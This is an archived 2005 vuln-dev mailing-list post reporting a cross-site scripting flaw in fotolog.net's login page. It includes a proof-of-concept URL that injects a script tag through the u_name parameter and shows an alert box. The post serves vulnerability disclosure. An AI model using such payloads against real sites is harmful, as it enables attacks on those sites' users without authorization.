XSS in fotolog.net

scolachado_at_hotmail.com
Date: 10/08/05

  • Next message: Gary Oleary-Steele: "[SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability"
    Date: 8 Oct 2005 15:27:48 -0000
    To: vuln-dev@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) Fotolog.net has a XSS bug in login area...

    http://my.fotolog.net/login.html?u_name=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

    Bye


  • Next message: Gary Oleary-Steele: "[SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability"